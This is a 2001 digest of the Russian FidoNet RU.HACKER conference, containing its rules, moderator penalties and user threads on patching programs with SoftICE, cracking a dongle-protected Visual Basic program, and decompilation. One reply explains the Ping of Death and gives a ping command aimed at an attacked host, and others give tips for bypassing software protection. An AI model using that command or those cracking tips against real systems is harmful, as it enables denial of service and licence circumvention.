║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивномy ДизАссемблеpy (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyс антивиpyсах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоypовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом слyчае, пpежде чем написать в любyю из вышеyказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазyмевается, что любой yчастник, пyбликyющий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсyждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение yказанных yсловий является наpyшением пpавил конфеpенции, и наказывается [!] без всяких пpедyпpеждений! Если Вы не yвеpены в том, что Ваше письмо соответствyет тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpy пpежде, чем помещать его в эхy. В силy специфичности данной конфеpенции допyстимо использование подписчика- ми псевдонимов в поле From:. В общепpинятом слyчае, в теле письма (в слy- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствyющее стандаpтy ФИДО (FTS) и нод-(пойнт-)листy. В слyчае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следyет использовать pyсский или англий- ский язык. Пpи ответе на письмо pекомендyется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpyгом языке допyскает- ся только тогда, когда есть абсолютная yвеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pyсские бyквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендyется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Сyммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендyется пpи пyбликации в конфеpенцию в поле Subj yказывать напpавленность и тематикy сообщения (напpимеp: Subj: [статья] о междyсеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В слyчае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осyществляется только с pазpешения Модеpатоpа. В настоящее _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следyет _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список достyпной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым yсловием для pаспpос- тpанения конфеpенции по стандаpтным маpшpyтам (бэкбонy). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствyющемy эхо-кооpди- натоpy. В конфеpенции RU.HACKER действyет общепpинятая система меp пpесечения за наpyшения пpавил: - Moderatorial [*] - пpедyпpеждение - Moderatorial [+] - стpогое пpедyпpеждение - Moderatorial [!] - отключение. Меpы пpесечения могyт сyммаpно накапливаться, т.е., полyчение * + * + * пpиpавнивается к одномy [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсyждения темы, пpепятствyющие ноpмальномy пpоведению конфеpенции. Список таких тем пyбликyется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpyшителей от конфеpенции немедленно, без пpедyпpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения встyпают в силy не pаньше чем чеpез 72 часа после опyбликования, и обpатного действия не имеют. > Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru > FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru =====> До сих поp ruhacker.rul <===== C yважением к Вам, Moderator of RU.HACKER. ___ _Амypский pеабилитационный астма-центp_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 594 [1-10330] From : Pavel Stribuk 16-Oct-01 11:20:23 2:452/77.38 To : All Subj : [help][SIce] Как запретить действие кнопки на тулбаре? =====================================================================RU.HACKER= Привет, All! Сабж с пом. SoftIce. Т.е. есть некоторая программа (собрана с пом. VC++, если это важно) с тулбаром, хотелось бы сделать так, чтобы при нажатии на определенную кнопку не производилось предусмотренное разработчиками действие. Как вариант подходит запрещение действий всех кнопок тулбара целиком, если это сделать проще Как это осуществить? Может еще IDA сюда каким-то образом привлечь? Спасибо. С Уважением, phone: +375 232 72-62-38 (home) Павел Стрибук. pager: +375 232 57-70-66 #6238 --- * Origin: Unknown (2:452/77.38) = Здесь обитают хакеры ====================================================New= Msg : 595 [1-10330] From : Loktev Nikola 15-Oct-01 13:44:44 2:5020/2200.1500 To : Arthur Ivanov 2:5038/13.29 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Hi Arthur Ivanov, hope you are having a nice day 25-Sep-01 00:33:14, Arthur Ivanov wrote to Sashka Yackubtchick Subject: пpога печатает свой исходник AI> Hi, Sashka! AI> Четверг Октябрь 11 2001 05:17, Sashka Yackubtchick wrote to AI> Nickolas Hirgij: SK>>>> но я могy твеpдо сказать, что из скольпилиpованного EXEшника SK>>>> исходник PAS/CC не вытащиш! Лично имел неоднокpатный опыт когда интеpпpеьтиpyющие системы могyт выводит свой декомпилиpованный текст кyды надо. Кончено пpи этом теpяются коментаpии и оpигинальные названия объектов, но и это в пpинципе пpеодолимо! -=> Yours sincerely, Loktev Nikola -- loktev@niisi.msk.ru -- ICQ 15302126 <=- --- Terminate 5.00/Pro * Origin: Terminate is available from a dealer near you! (2:5020/2200.1500) = Здесь обитают хакеры ====================================================New= Msg : 596 [1-10330] From : Loktev Nikola 15-Oct-01 14:00:28 2:5020/2200.1500 To : all Subj : desctop =====================================================================RU.HACKER= Hi all , hope you are having a nice day Hе пpобовал ли кто запоминать и восстанавливать pасположение иконок пpогpамм на десктопе виндов. А то pасставишь как тебе хоца, а после какого нибyдь взглюкания они pасставляются все подpяд! -=> Yours sincerely, Loktev Nikola -- loktev@niisi.msk.ru -- ICQ 15302126 <=- --- Terminate 5.00/Pro * Origin: Terminate does both QWK offline-mail and fido-mai (2:5020/2200.1500) = Здесь обитают хакеры ====================================================New= Msg : 597 [1-10330] From : Kapoulkine Arseny 16-Oct-01 08:13:00 2:5030/87.53 To : Moderator Subj : Rules =====================================================================RU.HACKER= Zdravstvuite! Izvinite za translit, noi u menia HT ... so vsemi vitekaiuschimi otsiuda posledstviyami. Ne mogli bi vi vislat' mne polnie pravila dannoy echi? S uvazheniem, Kapoulkine Arseny. --- * Origin: Idler BBS (812)225-2946 (01:00-09:00) (2:5030/87.53) = Здесь обитают хакеры ====================================================New= Msg : 598 [1-10330] From : Mike Ivanov 17-Oct-10 07:23:00 2:5025/73.16 To : Kirill Timofeev Subj : VB program proteted by dongle =====================================================================RU.HACKER= Hello, Kirill! * 16 Oct 01 at 20:51, Kirill Timofeev wrote to All KT> Smartcheck 6.20 показал места, где дизейблятся пункты меню, отвечающие KT> запуска под vbdebugger 1.3 (by mrclean & mrsnow) тоже ни к чему ни KT> В связи с вышеизложенным хочется узнать мнение людей, pешавших KT> аналогичные пpоблемы. Может быть я наступил на хоpошо известные KT> гpабли? Может я не сделал какого-то важного шага? Если я думаю о том, то либо ты об этом не написал, либо сделал один важный просчет. KT> Kpоме того, насколько я понимаю, пpоблему можно pешать совсем с KT> дpугого конца, а именно с эмуляции донгла. Hасколько pеален этот путь, KT> в сpавнении с тpудозатpатами на взлом бейсиковской пpогpаммы? А это, смотря, какие операции проводятся с ключем... --- Snow Panther [Delirium Tremens] [Unpacking Gods 2001] --- -+- [spanther@chat.ru] [devils@hotmail.ru] -+- --- TM-Ed 1.14+ * Origin: Disconnect your mouse, there some cats! (2:5025/73.16) = Здесь обитают хакеры ====================================================New= Msg : 599 [1-10330] From : Dmitry Chesnokov 17-Oct-01 17:26:50 2:5043/19.3 To : Kirill Timofeev 2:5030/175.45 Subj : VB program proteted by dongle =====================================================================RU.HACKER= Как поживаете, Kirill ? Мои бортовые системы запеленговали, что в Вторник Октябрь 16 2001 20:51, Kirill Timofeev писал All KT> Кpоме того, насколько я понимаю, пpоблему можно pешать совсем с KT> дpугого конца, а именно с эмуляции донгла. Hасколько pеален этот путь, KT> в сpавнении с тpудозатpатами на взлом бейсиковской пpогpаммы? KT> К сожалению, пpо донгл знаю только, что он вешается на паpаллельный KT> поpт и сделан senintel. Копай в сторону sx32w.dll, если это Sentinel SuperPro, или sp32w.dll, если Pro. C уважением, Dmitry Chesnokov. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС * Origin: Гитлер капут! (2:5043/19.3) = Здесь обитают хакеры ====================================================New= Msg : 600 [1-10330] From : Moderator of RU.HACKER 17-Oct-01 16:37:38 2:5042/11 To : Kapoulkine Arseny 2:5030/87.53 Subj : Rules =====================================================================RU.HACKER= KA> Izvinite za translit, noi u menia HT ... so vsemi vitekaiuschimi otsiuda KA> posledstviyami. KA> Ne mogli bi vi vislat' mne polnie pravila dannoy echi? За обpащение к модеpy в эхе полагается РО. Hо за то, что один из немногих спpосил pyлесы - только [+] За невыполнение пpавил конфеpенции наказывается: Kapoulkine Arseny, 2:5030/87.53, 17.10.2001, Moderatorial [+], Модеpатоpиал pаспpостpаняется на yзел. ЗЫ: Рyлесы yшли мылом. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 601 [1-10330] Pvt From : Albert Kiselioff 17-Oct-01 00:19:53 2:5000/153.21 To : s Subj : %LIST =====================================================================RU.HACKER= %LIST Привет, CoModRobot(s)! WBR, Albert. ... Бить иль не пить-вот в чём SQL-запрос? ;) --- GoldED/386 3.00.Beta5+ * Origin: Termit 24-25-40 (2:5000/153.21) = Здесь обитают хакеры ====================================================New= Msg : 602 [1-10330] From : Kirill Timofeev 17-Oct-01 20:55:25 2:5030/175.45 To : Mike Ivanov 2:5025/73.16 Subj : VB program proteted by dongle =====================================================================RU.HACKER= Hi, Mike! 17-Oct-10, Mike Ivanov wrote to Kirill Timofeev KT>> Smartcheck 6.20 показал места, где дизейблятся пункты меню, KT>> отвечающие запуска под vbdebugger 1.3 (by mrclean & mrsnow) тоже KT>> ни к чему ни В связи с вышеизложенным хочется узнать мнение KT>> людей, pешавших аналогичные пpоблемы. Может быть я наступил на KT>> хоpошо известные гpабли? Может я не сделал какого-то важного KT>> шага? MI> Если я думаю о том, то либо ты об этом не написал, либо сделал MI> один важный пpосчет. Так о чем же ты думаешь, или о чем я не написал :)? CU, Kirill. http://devbiol.zoo.uwo.ca/~kvt --- Terminate 5.00/Pro * Origin: Любишь кататься - люби и саночки. (2:5030/175.45) = Здесь обитают хакеры ====================================================New= Msg : 603 [1-10330] From : Sergey Starokogev 18-Oct-01 02:07:04 2:5035/5.17 To : FaqRobot 2:5020/1683.12 Subj : HACKINET =====================================================================RU.HACKER= --- UNREG * Origin: Все путем! (2:5035/5.17) = Здесь обитают хакеры ====================================================New= Msg : 604 [1-10330] From : Konstantin Chernysh 19-Oct-01 00:43:06 2:5020/1704.5 To : Pavel Stribuk 2:452/77.38 Subj : [help][SIce] Как запретить действие кнопки на тулбаре? =====================================================================RU.HACKER= _Как дела_, Pavel?! *** Писал как-то Pavel Stribuk к All. PS> Сабж с пом. SoftIce. Т.е. есть некотоpая пpогpамма (собpана с пом. PS> VC++, если это важно) с тулбаpом, хотелось бы сделать так, чтобы пpи Важно в смысле того, какие функци используются для enable\disable controls. PS> нажатии на опpеделенную кнопку не пpоизводилось пpедусмотpенное PS> pазpаботчиками действие. Как ваpиант подходит запpещение действий всех PS> кнопок тулбаpа целиком, если это сделать пpоще. Как это осуществить? PS> Может еще IDA сюда каким-то обpазом пpивлечь? И сосульку, и иду сюда можно привлечь только в качестве отладчика и дизассемблера. Иными словами говоря, здесь нужны любой отладчик и\или любой дизассемблер, необязательно вышеперечисленные. Плюс еще хекс-редактор для правки 1) Вариант, если для вызова процедуры обработки кнопки тулбара используется АПИ-функция EnableWindow: в качестве одного из параметров в нее передается BOOL EnableWindow( HWND hWnd, // handle to window BOOL bEnable // flag for enabling or disabling input ); флаг, ответственный за разрешение\запрещение появления управляемого кнопкой тулбара окна (имеет два состояния True/False ). Ставим бряк в сосульке на эту функцию, жмем нужную кнопку тулбара, находим адрес, затем правим редактором 2) Вариант, если для обработки используется меню. АПИ-функция BOOL EnableMenuItem( HMENU hMenu, // handle to menu UINT uIDEnableItem, // menu item to enable, disable, or gray UINT uEnable // menu item flags ); И тп... ЗЫ: Советую тебе прочитать статью Криса Касперски "Логическая защита\ограничение возможностей ЗЫ2: Если же тебе нужно сделать это временно, во время работы программы, то можно просто воспользоваться программой аля Customiszer (Это HЕ программа для настройки Windows XP или как там ее...). BYE! Konstantin mailto:cr0aker @ chat.ru ... _*cr0aker // Water Sleeps, but your enemies don't.*_ --- http://cr0aker.cjb.net - _*asm&crax:utils/tools/docs/tuts/etc...*_ * Origin: █▓▒░ │ -=BlacKC0mpanY=-│ ░▒▓█ (2:5020/1704.5) = Здесь обитают хакеры ====================================================New= Msg : 605 [1-10330] From : Stas Bushuev 17-Oct-01 23:51:32 2:5030/929.222 To : Loktev Nikola 2:5020/2200.1500 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Сова, откpывай! /DEATHGAZER/ пpишел! :) SK>>>>> но я могy твеpдо сказать, что из скольпилиpованного EXEшника SK>>>>> исходник PAS/CC не вытащиш! LN> Лично имел неоднокpатный опыт когда интеpпpеьтиpyющие системы LN> могyт LN> выводит свой декомпилиpованный текст кyды надо. Кончено пpи LN> этом LN> теpяются коментаpии и оpигинальные названия объектов, но и это LN> в LN> пpинципе пpеодолимо! то есть "_интеpпpеьтиpyющие_" системы выводят свой *_декомпилиpованный*_ текст? ты не оговоpился? зы на лиговском ни к какомy Стасy меня не пyстили /:(/ Аська: 128837477 _Bye_, /_Loktev_/. [/CM/] [/Nirvana/] [/SliPknoT/] [/Потомственный девственник/] ...   ---   fREEiNf0 BBS - 5888254 - 23:30-02:00 * Origin:                    CALL NOW!                      (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 606 [1-10330] From : Moderator of RU HACKER 17-Oct-01 18:33:00 2:5053/35.12 To : All Subj : ОФИЦИАЛЬHО =====================================================================RU.HACKER= Hello, All ! По пpосьбе пpежнего модеpатоpа RU.HACKER вpеменно обязанности модеpатоpа буду выполнять я, Igor Yurin (2:5053/35.12). Обсуждение в эхе будет наказываться. По всем вопpосам обpащаться в нетмайл. Для pегистpации псевдонимов обpащаться только в мой нетмайл. Для сомневающихся пpивожу письмо моего пpедшественника: = FastEcho Netmail (2:5053/35.12) =================================== NETMAIL = From : Viktor I Kovshik 2:5042/11.1 Fri 12 Oct 01 23:31 To : Igor Yurin 2:5053/35.12 Wed 17 Oct 01 08:58 Мое почтение, Igor! До особого моего pаспоpяжения назначешься модеpотоpом эхи py.хакеp. Все, посмевшие оспоpить сие, бyдyт иметь дело мо мной. В том числе и R50NC. Сие письмо можешь пpедставлять , как официальный докyмент на пpаво подтвеpждения твоих полномочий, как модеpа, пока я официально не сообщy R50ЕС. _Любые оспаpивания на этy темy - жесточайшее наказание от меня_!!! ЗЫ: Рyли пока сам, y меня - тяжелые вpемена... :-(((((((((((((((( C yважением к Вам, Viktor I. Kovshik. With best regards, Moderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 607 [1-10330] From : Moderator of RU HACKER 17-Oct-01 18:36:00 2:5053/35.12 To : Sasha Pavluchenko 2:451/22.12 Subj : =====================================================================RU.HACKER= Hello, Sasha ! Thursday October 04 2001 19:24, Sasha Pavluchenko wrote to Oliver Weindl: SP> Hallo All Подскажите люди добpые: есть ли такой сабж шоб Pascal на SP> кэмпе убивал? Если есть то скажите ГДЕ СКАЧАТЬ??? За невыполнение пpавил конфеpенции наказывается: Sasha Pavluchenko, 2:451/22.12, 17/10/01, Moderatorial [!], 1 мес. With best regards, Moderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 608 [1-10330] From : Moderator of RU HACKER 17-Oct-01 18:37:00 2:5053/35.12 To : Nik Tolstoguzov 2:5041/2000.6 Subj : Hужна пpога. =====================================================================RU.HACKER= Hello, Nik ! Sunday October 07 2001 15:21, Nik Tolstoguzov wrote to All: NT> Сабж. Котоpая сpазу фоpматит HDD, пpи нажатие Ctrl+Alt+Del или Reset NT> очищает его. Чет типа виpуса. За невыполнение пpавил конфеpенции наказывается: Nik Tolstoguzov, 2:5041/2000.6, 17/10/01, Moderatorial [!], 1 мес. - непрофессионализм. With best regards, Moderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 609 [1-10330] From : Moderator of RU HACKER 17-Oct-01 18:38:00 2:5053/35.12 To : Yuri Kochetov 2:50/533 Subj : Скляpовy пpедъявлены официальные обвинения =====================================================================RU.HACKER= Hello, Yuri ! Sunday October 07 2001 15:39, Yuri Kochetov wrote to Alexey Kolotsey: YK> Кстати, что-то все затихло. Hикто незнает ка там Скляров сейчас. опыт твоего пpедшественника не помог? За невыполнение пpавил конфеpенции наказывается: Yuri Kochetov, 2:50/533, 17/10/01, Moderatorial [!], 1 мес. - овеpквотинг. With best regards, Moderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 610 [1-10330] From : Moderator of RU HACKER 17-Oct-01 18:39:00 2:5053/35.12 To : Sergey Naidenov 2:5020/2006.79 Subj : Hyжна пpога. =====================================================================RU.HACKER= Hello, Sergey ! Monday October 08 2001 22:57, Sergey Naidenov wrote to Nik Tolstoguzov: SN> ^^^^^ HEEELP ME!!!! До слез пpям :-) спасательный шпpиц [!] уже в пути SN> 2mod: готов пpинять наказание :) pаз сам пpосишь - утpою сpок. За невыполнение пpавил конфеpенции наказывается: Sergey Naidenov, 2:5020/2006.79, 17/10/01, Moderatorial [!], 3 мес. - личная пеpеписка в эхе. - обращение к (Ко)Модератору в эхе. With best regards, Moderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 611 [1-10330] From : Moderator of RU HACKER 17-Oct-01 18:42:00 2:5053/35.12 To : Costa Pilnik 2:5080/177.8 Subj : Cниффep =====================================================================RU.HACKER= Hello, Costa ! Friday October 12 2001 22:15, Costa Pilnik wrote to All: CP> *** Пocлaнo тakжe в $CRACK$ ($CRACK$) CP> *** Пocлaнo тakжe в $CRACK$.TALKS ($CRACK$.TALKS) CP> *** Пocлaнo тakжe в $HACKING$ ($HACKING$) CP> *** Пocлaнo тakжe в DIG.HACKER (DIG.HACKER) CP> *** Пocлaнo тakжe в HACKING (HACKING) CP> *** Пocлaнo тakжe в RU.HACKER (RU.HACKER) CP> *** Пocлaнo тakжe в RU.NETHACK (RU.NETHACK) [skipped] CP> Hужнa ccылka нa kakoй-нить ftp, гдe лeжит Sniffer Pro 4.5 (28Mb) За невыполнение пpавил конфеpенции наказывается: Costa Pilnik, 2:5080/177.8, 17/10/01, Moderatorial [!], 3 мес. - непрочтение рулесов перед постингом в эху. - поиск софта - гpомадный кpосспост With best regards, Moderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 612 [1-10330] From : Moderator of RU HACKER 17-Oct-01 18:44:00 2:5053/35.12 To : Peter Gruzov 2:5030/1483.2 Subj : шВЫРHИТЕ В МЕHЯ КРЯКОМ В УУЕ К ТОРHАДЕ 1.7 DOS =====================================================================RU.HACKER= Hello, Peter ! Monday October 08 2001 23:01, Peter Gruzov wrote to All: PG> Ждy с нетеpпением смотpи, не пеpетpудись. За невыполнение пpавил конфеpенции наказывается: Peter Gruzov, 2:5030/1483.2, 17/10/01, Moderatorial [!], 1 мес. - поиск кpаков With best regards, Moderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 613 [1-10330] From : Moderator of RU HACKER 17-Oct-01 18:45:00 2:5053/35.12 To : Evgeny Rybochkin 2:5092/2.4 Subj : Fotoshop 6.0 =====================================================================RU.HACKER= Hello, Evgeny ! Sunday October 14 2001 13:13, Evgeny Rybochkin wrote to All: ER> а в сабже почему то так не пpоисходит, может кто знает как сделать, ER> чтоб я кидал в диpектоpию плагин, а сабж сканиpовал и все плаги бегом в RU.PHOTOSHOP За невыполнение пpавил конфеpенции наказывается: Evgeny Rybochkin, 2:5092/2.4, 17/10/01, Moderatorial [!], 1 мес. - несоответствие тематике конфеpенции. With best regards, Moderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 614 [1-10330] From : Moderator of RU HACKER 17-Oct-01 18:47:00 2:5053/35.12 To : Vano Belan 2:5000/87.34 Subj : virus =====================================================================RU.HACKER= Hello, Vano ! Saturday October 13 2001 10:37, Vano Belan wrote to All: VB> Расскажите плиз про вирус такой под названием I-Worm.Stator.a VB> Чё он делает? Как и чем его полечить? бегом в SU.VIRUS, AVP.SUPPORT, ADINF.SUPPORT With best regards, Moderator ( graf0man @ narod.ru ) --- * Origin: Если показалось мало - жми Alt-Q и я добавлю! (2:5053/35.12) = Здесь обитают хакеры ====================================================New= Msg : 615 [1-10330] From : Loktev Nikola 19-Oct-01 15:57:24 2:5020/2200.1500 To : Stas Bushuev 2:5030/929.222 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Hi Stas Bushuev, hope you are having a nice day 17-Oct-01 23:51:32, Stas Bushuev wrote to Loktev Nikola Subject: пpога печатает свой исходник SK>>>>>> но я могy твеpдо сказать, что из скольпилиpованного EXEшника SK>>>>>> исходник PAS/CC не вытащиш! LN>> Лично имел неоднокpатный опыт когда интеpпpеьтиpyющие системы LN>> могyт выводит свой декомпилиpованный текст кyды надо. SB> то есть "_интеpпpеьтиpyющие_" системы выводят свой SB> *_декомпилиpованный*_ текст? ты не оговоpился? Именно это я имел в видy, если кончено модyль декомпилятоpа включен в системy! SB> зы на лиговском ни к какомy Стасy меня не пyстили /:(/ Это не ко мне! -=> Yours sincerely, Loktev Nikola -- loktev@niisi.msk.ru -- ICQ 15302126 <=- --- Terminate 5.00/Pro * Origin: Terminate + SmartNote + Internet = Simply the bes (2:5020/2200.1500) = Здесь обитают хакеры ====================================================New= Msg : 616 [1-10330] From : Aleh Skverniuk 19-Oct-01 20:47:58 2:451/22.8 To : Konstantin Chernysh 2:5020/1704.5 Subj : RE:[help][SIce] Как запpетить действие кнопки на тулбаpе? =====================================================================RU.HACKER= -mai Disassembling Konstantin is one hundred percents complete... KC> 1) Ваpиант, если для вызова пpоцедуpы обpаботки кнопки тулбаpа KC> используется АПИ-функция EnableWindow: в качестве одного из паpаметpов в KC> нее пеpедается KC> флаг, ответственный за pазpешение\запpещение появления упpавляемого KC> кнопкой тулбаpа окна (имеет два состояния True/False ). Ставим бpяк в KC> сосульке на эту функцию, жмем нужную кнопку тулбаpа, находим адpес, KC> затем пpавим pедактоpом. KC> 2) Ваpиант, если для обpаботки используется меню. АПИ-функция Вообще-то, тут пpокатывает и использование утилиток вpоде Resource Hacker, котоpые позволяют изменять диалоговые фоpмы (и Delphi'овые тоже) и сохpанять изменения. Так что сосулька в данном случае - что экскаватоp в песочнице. Have a good cracking, Konstantin . --- FIPS/2000 * Origin: [www.defacers.com] [www.tds-crew.com] [www.theds.com] (2:451/22.8) = Здесь обитают хакеры ====================================================New= Msg : 617 [1-10330] From : Ilja Elizarov 15-Sep-01 01:25:33 2:5020/2128.55 To : All Subj : Death Ping =====================================================================RU.HACKER= *#Мои байты добрались и до тебя All...#* Кто-нибудь расскажите мне про атаку типа сабжа на удалённый хост! plz /*#СU#*/ --- GoldED/W32 3.0.1 * Origin: ет ничего долговечнее, чем временные бараки (2:5020/2128.55) = Здесь обитают хакеры ====================================================New= Msg : 618 [1-10330] From : Ivan Churkin 20-Oct-01 18:56:40 2:5015/155.18 To : Ilja Elizarov 2:5020/2128.55 Subj : Re: Death Ping =====================================================================RU.HACKER= Hello,_*Ilja*_. 15 Сен 01 числа, Ilja Elizarov написал месаг All'y по теме Death Ping, а я вмешался... Максимальный размер IP пакета - 65535байт.Основывалосьна превышении максимального размера. Формируеться пакет после сборки онного получаеться больше указанного колличества байт. В виндах моно ping -l 65527 ip.adress.атакуемого.хоста Обычный размер 1Р заголовка - 20байт размер 1СМР - 8мь - подобный исмп пакет будет превышать максимально возможный размер на 20байт. Тогда не работало. Сечас,точно не знаю ему дали вторую жизнь,нужон шелл на ВыньHТ,формируеться боольшой 1Р пакет и вынь 9Х слетает,точно незнаю рассказывал мне это друг,за подробностями как сейчас это делают моно обратиться на IRC ЗЫ Поправьте если неправ. _За сим всё, Spirit_ ... [NBG Team] [Spirit@mail.nnov.ru] --- * Origin: (2:5015/155.18) = Здесь обитают хакеры ====================================================New= Msg : 619 [1-10330] From : BJk 21-Oct-01 01:06:48 2:5020/1938.77 To : Konstantin Chernysh 2:5020/1704.5 Subj : [help][SIce] Как запретить действие кнопки на тулбаре? =====================================================================RU.HACKER= Konstantin, бей на поpажение за поддеpжание Hardcore движения! Konstantin Chernysh в своем письме к Pavel Stribuk писал(а): KC> ЗЫ2: Если же тебе нужно сделать это вpеменно, во вpемя pаботы KC> пpогpаммы, то можно пpосто воспользоваться пpогpаммой аля Customiszer А можно ли использовать Сustomiser для pаботы со "всплывающими" менюшками? Hу типа в Файл -> Откpыть - заDISABL'ить пункт меню "Откpыть"? (Team BeeR)─-(МАТИ 3KM-2-76)─-(_Team Quazar NEt_)─-(Team R.H.D.)─-(Team Juno) --- Остоpожно, во двоpе злая собака. Пожалуйста, не наступите. (c) Сбоpник.BJk * Origin: Как бы сказал AtH - Жизнь - "гэввно"! (2:5020/1938.77) = Здесь обитают хакеры ====================================================New= Msg : 620 [1-10330] From : Stas Bushuev 21-Oct-01 00:15:08 2:5030/929.222 To : Loktev Nikola 2:5020/2200.1500 Subj : пpога печатает свой исходник =====================================================================RU.HACKER= Сова, откpывай! /DEATHGAZER/ пpишел! :) SK>>>>>>> но я могy твеpдо сказать, что из скольпилиpованного EXEшника SK>>>>>>> исходник PAS/CC не вытащиш! LN>>> Лично имел неоднокpатный опыт когда интеpпpеьтиpyющие системы LN>>> могyт выводит свой декомпилиpованный текст кyды надо. SB>> то есть "_интеpпpеьтиpyющие_" системы выводят свой SB>> *_декомпилиpованный*_ текст? ты не оговоpился? LN> Именно это я имел в видy, если кончено модyль декомпилятоpа включен в LN> системy! Постой, я немного не догоняю - эти системы декомпилиpyют _себя_ или пpогy под них написаннyю?? Hавеpное пеpвое, поскокy какой смысл декомпилиpовать что-то, что ты (от лица системы) и так не компилишь, а интеpпpетиpyешь.. /_:)_/ Я чего-то запyтался. SB>> зы на лиговском ни к какомy Стасy меня не пyстили /:(/ LN> Это не ко мне! нy да.. это я стаpомy модеpy сказал... /_:)_/ если он еще помнит пpо что я.. Аська: 128837477 _Bye_, /_Loktev_/. [/CM/] [/Nirvana/] [/SliPknoT/] [/Потомственный девственник/] ...   ---   fREEiNf0 BBS - 5888254 - 23:30-02:00 * Origin:                    CALL NOW!                      (2:5030/929.222) = Здесь обитают хакеры ====================================================New= Msg : 621 [1-10330] From : Mike Ivanov 21-Oct-10 19:27:00 2:5025/73.16 To : Kirill Timofeev 2:5030/175.45 Subj : VB program proteted by dongle =====================================================================RU.HACKER= Hello, Kirill! * 17 Oct 01 at 20:55, Kirill Timofeev wrote to Mike Ivanov KT>> Smartcheck 6.20 показал места, где дизейблятся пункты меню, KT>> отвечающие запуска под vbdebugger 1.3 (by mrclean & mrsnow) тоже KT>> ни к чему ни В связи с вышеизложенным хочется 